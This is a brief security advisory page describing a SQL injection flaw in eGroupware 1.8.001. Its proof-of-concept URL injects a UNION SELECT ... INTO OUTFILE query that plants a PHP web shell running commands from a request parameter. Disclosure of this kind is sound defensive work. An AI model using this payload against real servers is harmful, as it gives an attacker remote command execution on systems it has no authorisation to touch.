Home
Consulting
Advisories
Software
Articles
Contact

eGroupware 1.8.001 SQL Injection

Legacy Advisories

Description

A SQL injection vulnerability in eGroupware 1.8.001 can be exploited to extract arbitrary data. In some environments it may be possible to create a PHP shell.

Proof Of Concept

http://localhost/egroupware/phpgwapi/js/dhtmlxtree/samples/with_db/loaddetails.php?id=0%20and%201=0%20UNION%20SELECT%20'%3C?php%20system($_GET[%22CMD%22]);%20?%3E','',''%20FROM%20dual%20INTO%20OUTFILE%20'../../htdocs/shell.php';%23


Copyright © 2018 AutoSec Tools LLC